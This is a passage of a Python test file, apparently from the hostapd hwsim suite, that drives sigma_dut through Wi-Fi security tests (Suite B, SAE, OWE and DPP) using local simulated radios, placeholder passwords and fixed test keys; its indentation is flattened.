sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_suite_b(dev, apdev, params):
"""sigma_dut controlled STA Suite B"""
check_suite_b_192_capa(dev)
logdir = params['logdir']
with open("auth_serv/ec2-ca.pem", "r") as f:
with open(os.path.join(logdir, "suite_b_ca.pem"), "w") as f2:
f2.write(f.read())
with open("auth_serv/ec2-user.pem", "r") as f:
with open("auth_serv/ec2-user.key", "r") as f2:
with open(os.path.join(logdir, "suite_b.pem"), "w") as f3:
f3.write(f.read())
f3.write(f2.read())
dev[0].flush_scan_cache()
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
params = { "ssid": "test-suite-b",
"wpa": "2",
"wpa_key_mgmt": "WPA-EAP-SUITE-B-192",
"rsn_pairwise": "GCMP-256",
"group_mgmt_cipher": "BIP-GMAC-256",
"ieee80211w": "2",
"ieee8021x": "1",
'auth_server_addr': "127.0.0.1",
'auth_server_port': "18129",
'auth_server_shared_secret': "radius",
'nas_identifier': "nas.w1.fi" }
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b.pem,trustedRootCA,suite_b_ca.pem,CertType,ECC" % (ifname, "test-suite-b"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_suite_b_rsa(dev, apdev, params):
"""sigma_dut controlled STA Suite B (RSA)"""
check_suite_b_192_capa(dev)
logdir = params['logdir']
with open("auth_serv/rsa3072-ca.pem", "r") as f:
with open(os.path.join(logdir, "suite_b_ca_rsa.pem"), "w") as f2:
f2.write(f.read())
with open("auth_serv/rsa3072-user.pem", "r") as f:
with open("auth_serv/rsa3072-user.key", "r") as f2:
with open(os.path.join(logdir, "suite_b_rsa.pem"), "w") as f3:
f3.write(f.read())
f3.write(f2.read())
dev[0].flush_scan_cache()
params = suite_b_192_rsa_ap_params()
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
cmd = "sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b_rsa.pem,trustedRootCA,suite_b_ca_rsa.pem,CertType,RSA" % (ifname, "test-suite-b")
tests = [ "",
",TLSCipher,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
",TLSCipher,TLS_DHE_RSA_WITH_AES_256_GCM_SHA384" ]
for extra in tests:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd + extra)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_ap_suite_b(dev, apdev, params):
"""sigma_dut controlled AP Suite B"""
check_suite_b_192_capa(dev)
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_suite_b.sigma-hostapd")
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,SuiteB")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192",
ieee80211w="2",
openssl_ciphers="SUITEB192",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ec2-ca.pem",
client_cert="auth_serv/ec2-user.pem",
private_key="auth_serv/ec2-user.key",
pairwise="GCMP-256", group="GCMP-256",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_cipher_gcmp_128(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-128/BIP-GMAC-128 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-128", "BIP-GMAC-128",
"GCMP")
def test_sigma_dut_ap_cipher_gcmp_256(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-256/BIP-GMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256",
"GCMP-256")
def test_sigma_dut_ap_cipher_ccmp_128(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128/BIP-CMAC-128 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128", "BIP-CMAC-128",
"CCMP")
def test_sigma_dut_ap_cipher_ccmp_256(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-256/BIP-CMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-256", "BIP-CMAC-256",
"CCMP-256")
def test_sigma_dut_ap_cipher_ccmp_gcmp_1(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (1)"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256",
"BIP-GMAC-256", "CCMP")
def test_sigma_dut_ap_cipher_ccmp_gcmp_2(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (2)"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256",
"BIP-GMAC-256", "GCMP-256", "CCMP")
def test_sigma_dut_ap_cipher_gcmp_256_group_ccmp(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-256/CCMP/BIP-GMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256",
"GCMP-256", "CCMP", "AES-CCMP-128")
def run_sigma_dut_ap_cipher(dev, apdev, params, ap_pairwise, ap_group_mgmt,
sta_cipher, sta_cipher_group=None, ap_group=None):
check_suite_b_192_capa(dev)
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_cipher.sigma-hostapd")
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius")
cmd = "ap_set_security,NAME,AP,KEYMGNT,SuiteB,PMF,Required,PairwiseCipher,%s,GroupMgntCipher,%s" % (ap_pairwise, ap_group_mgmt)
if ap_group:
cmd += ",GroupCipher,%s" % ap_group
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
if sta_cipher_group is None:
sta_cipher_group = sta_cipher
dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192",
ieee80211w="2",
openssl_ciphers="SUITEB192",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ec2-ca.pem",
client_cert="auth_serv/ec2-user.pem",
private_key="auth_serv/ec2-user.key",
pairwise=sta_cipher, group=sta_cipher_group,
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_override_rsne(dev, apdev):
"""sigma_dut controlled AP overriding RSNE"""
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("dev_configure_ie,NAME,AP,interface,%s,IE_Name,RSNE,Contents,30180100000fac040200ffffffff000fac040100000fac020c00" % iface)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae(dev, apdev, params):
"""sigma_dut controlled AP with SAE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae.sigma-hostapd")
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_password(dev, apdev, params):
"""sigma_dut controlled AP with SAE and long password"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_password.sigma-hostapd")
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK," + 100*'C')
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", sae_password=100*'C',
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_sae_group(dev, apdev, params):
"""sigma_dut controlled AP with SAE and specific group"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_sae_group.sigma-hostapd")
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-SAE,PSK,12345678,ECGroupID,20")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
ieee80211w="2", scan_freq="2412")
if dev[0].get_status_field('sae_group') != '20':
raise Exception("Expected SAE group not used")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sae(dev, apdev, params):
"""sigma_dut controlled AP with PSK+SAE"""
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sae.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-sae,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-SAE,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[2].request("SET sae_groups ")
dev[2].connect("test-sae", key_mgmt="SAE", psk="12345678",
scan_freq="2412", ieee80211w="0", wait_connect=False)
dev[0].request("SET sae_groups ")
dev[0].connect("test-sae", key_mgmt="SAE", psk="12345678",
scan_freq="2412", ieee80211w="2")
dev[1].connect("test-sae", psk="12345678", scan_freq="2412")
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED"], timeout=0.1)
dev[2].request("DISCONNECT")
if ev is not None:
raise Exception("Unexpected connection without PMF")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_owe(dev, apdev):
"""sigma_dut controlled OWE station"""
try:
run_sigma_dut_owe(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_owe(dev, apdev):
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
params = { "ssid": "owe",
"wpa": "2",
"wpa_key_mgmt": "OWE",
"ieee80211w": "2",
"rsn_pairwise": "CCMP" }
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
dev[0].dump_monitor()
sigma_dut_cmd("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid))
dev[0].wait_connected()
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,20" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].wait_disconnected()
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,owe,Type,OWE,ECGroupID,0" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,owe,channel,1" % ifname)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
if ev is None:
raise Exception("Association not rejected")
if "status_code=77" not in ev:
raise Exception("Unexpected rejection reason: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe(dev, apdev, params):
"""sigma_dut controlled AP with OWE"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe.sigma-hostapd")
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_ecgroupid(dev, apdev):
"""sigma_dut controlled AP with OWE and ECGroupID"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OWE,ECGroupID,20 21,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="20", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="21", scan_freq="2412")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
owe_group="19", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"], timeout=10)
dev[0].request("DISCONNECT")
if ev is None:
raise Exception("Association not rejected")
if "status_code=77" not in ev:
raise Exception("Unexpected rejection reason: " + ev)
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_transition_mode(dev, apdev, params):
"""sigma_dut controlled AP with OWE and transition mode"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe_transition_mode.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G")
res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412")
if dev[0].get_status_field('bssid') not in res1:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res1)
if dev[1].get_status_field('bssid') not in res2:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res2)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_owe_transition_mode_2(dev, apdev, params):
"""sigma_dut controlled AP with OWE and transition mode (2)"""
if "OWE" not in dev[0].get_capability("key_mgmt"):
raise HwsimSkip("OWE not supported")
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_owe_transition_mode_2.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,NAME,AP,Program,WPA3")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,owe,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,NONE")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,OWE")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
res1 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,1,Interface,24G")
res2 = sigma_dut_cmd_check("ap_get_mac_address,NAME,AP,WLAN_TAG,2,Interface,24G")
dev[0].connect("owe", key_mgmt="OWE", ieee80211w="2",
scan_freq="2412")
dev[1].connect("owe", key_mgmt="NONE", scan_freq="2412")
if dev[0].get_status_field('bssid') not in res2:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,2: " + res1)
if dev[1].get_status_field('bssid') not in res1:
raise Exception("Unexpected ap_get_mac_address WLAN_TAG,1: " + res2)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def dpp_init_enrollee(dev, id1):
logger.info("Starting DPP initiator/enrollee in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d role=enrollee" % id1
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_qr_resp_1(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 1)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1)
def test_sigma_dut_dpp_qr_resp_2(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 2)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 2)
def test_sigma_dut_dpp_qr_resp_3(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 3)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 3)
def test_sigma_dut_dpp_qr_resp_4(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 4)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 4)
def test_sigma_dut_dpp_qr_resp_5(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 5)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 5)
def test_sigma_dut_dpp_qr_resp_6(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 6)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 6)
def test_sigma_dut_dpp_qr_resp_7(dev, apdev):
"""sigma_dut DPP/QR responder (conf index 7)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 7)
def test_sigma_dut_dpp_qr_resp_chan_list(dev, apdev):
"""sigma_dut DPP/QR responder (channel list override)"""
run_sigma_dut_dpp_qr_resp(dev, apdev, 1, chan_list='81/2 81/6 81/1',
listen_chan=2)
def run_sigma_dut_dpp_qr_resp(dev, apdev, conf_idx, chan_list=None,
listen_chan=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
if chan_list:
cmd += ",DPPChannelList," + chan_list
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = hex.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
t = threading.Thread(target=dpp_init_enrollee, args=(dev[1], id1))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPConfIndex,%d,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,STA,DPPSigningKeyECC,P-256,DPPBS,QR,DPPTimeout,6" % conf_idx
if listen_chan:
cmd += ",DPPListenChannel," + str(listen_chan)
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
except:
raise HwsimSkip("DPP not supported")
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % ("DPPNET01".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
